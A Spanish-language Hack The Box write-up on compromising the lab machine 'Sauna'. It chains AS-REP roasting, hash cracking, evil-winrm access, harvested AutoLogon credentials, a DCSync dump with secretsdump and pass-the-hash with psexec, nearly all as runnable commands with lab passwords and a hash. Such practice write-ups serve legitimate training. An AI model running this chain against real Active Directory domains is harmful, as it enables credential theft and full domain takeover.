write-ups / hackthebox / sauna-htb

HackTheBoxeasyWindows

Sauna — AS-REP Roasting y AutoLogon en Active Directory

Ataque a Active Directory en Sauna de HTB. Enumeración web para usuarios, AS-REP Roasting, credenciales AutoLogon y DCSync con secretsdump.

14 de junio de 20241 min read
HTBActive DirectoryAS-REP RoastingWinPEASDCSync

Reconocimiento

bash
nmap -sV -sC -oN sauna.nmap 10.10.10.175
Domain Controller
bash
EGOTISTICAL-BANK.LOCAL
. Puertos: 80 (HTTP), 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM).

Enumeración de usuarios

La página web del banco muestra el equipo. Construimos posibles usernames:

bash
fsmith
scoins
hbear
btaylor
sdriver
skerb

AS-REP Roasting

bash
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.175 -no-pass
El usuario
bash
fsmith
no requiere pre-autenticación Kerberos.
bash
hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt
Password:
bash
Thestrokes2022

Acceso inicial

bash
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes2022

Escalación de privilegios

WinPEAS revela credenciales de AutoLogon en el registro:

bash
DefaultUserName: svc_loanmanager
DefaultPassword: Moneymakestheworldgoround!

DCSync

El usuario
bash
svc_loanmanager
tiene privilegios de replicación en Active Directory:
bash
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@10.10.10.175

Administrator

bash
psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e